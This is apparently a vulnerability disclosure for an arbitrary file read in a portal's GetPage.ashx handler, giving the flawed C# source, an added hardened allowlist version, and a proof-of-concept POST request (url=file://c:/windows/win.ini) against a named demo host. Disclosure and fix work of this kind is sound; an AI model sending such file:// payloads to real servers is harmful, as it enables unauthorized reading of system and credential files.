Data Local Portal System: Arbitrary File Read

Vulnerability author: hello

Details:

Address

http://demo.htmdata.com/ashx/GetPage.ashx
 

The main source code is as follows:

public void ProcessRequest(HttpContext context)
{
    context.Response.ContentType = "text/plain";
    string s = "";
    string requestUriString = Tool.CStr(context.Request["url"]);
    try
    {
        WebRequest request = WebRequest.Create(requestUriString);
        WebResponse response = request.GetResponse();
        Stream responseStream = response.GetResponseStream();
        using (StreamReader reader = new StreamReader(responseStream, Encoding.UTF8))
        {
            s = reader.ReadToEnd();
        }
        request.Abort();
        response.Close();
        responseStream.Dispose();
    }
    catch (Exception)
    {
    }
    context.Response.Write(s);
}
 

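If the url parameter is a file:// URL, WebRequest.Create returns a FileWebRequest that reads from the server's local file system, so arbitrary files can be downloaded.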
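
A hardened version of the handler, added here as an example and not part of the original report or the vendor's code: it accepts only absolute http/https URLs whose host is on an allowlist, so file:// and other schemes never reach WebRequest.Create. The class name GetPageHardened, the IsAllowed helper and the example.com host names are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Text;
using System.Web;

// Added example: hypothetical hardened replacement for GetPage.ashx.
public class GetPageHardened : IHttpHandler
{
    // Assumption: the portal only needs to fetch pages from a few known hosts.
    // These host names are placeholders, not values from the original application.
    private static readonly HashSet<string> AllowedHosts =
        new HashSet<string>(StringComparer.OrdinalIgnoreCase) { "news.example.com", "static.example.com" };

    public bool IsReusable { get { return true; } }

    // Returns true only for absolute http/https URLs whose host is allowlisted.
    public static bool IsAllowed(string raw, out Uri uri)
    {
        return Uri.TryCreate(raw, UriKind.Absolute, out uri)
            && (uri.Scheme == Uri.UriSchemeHttp || uri.Scheme == Uri.UriSchemeHttps)
            && AllowedHosts.Contains(uri.Host);
    }

    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/plain";
        Uri uri;
        if (!IsAllowed(context.Request["url"], out uri))
        {
            context.Response.StatusCode = 400; // file://, ftp://, relative URLs and unknown hosts stop here
            return;
        }
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(uri);
        request.AllowAutoRedirect = false; // a redirect must not lead off the allowlist
        request.Timeout = 5000;            // milliseconds
        try
        {
            using (WebResponse response = request.GetResponse())
            using (StreamReader reader = new StreamReader(response.GetResponseStream(), Encoding.UTF8))
            {
                context.Response.Write(reader.ReadToEnd());
            }
        }
        catch (WebException)
        {
            context.Response.StatusCode = 502; // upstream fetch failed; no error detail is echoed back
        }
    }
}
```

With this check in place, the request body url=file://c:/windows/win.ini shown in the proof is answered with HTTP 400 instead of the file contents.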

Proof of vulnerability:

Official site

Visit
http://demo_htmdata_com/ashx/GetPage.ashx

Submit via POST
url=file://c:/windows/win.ini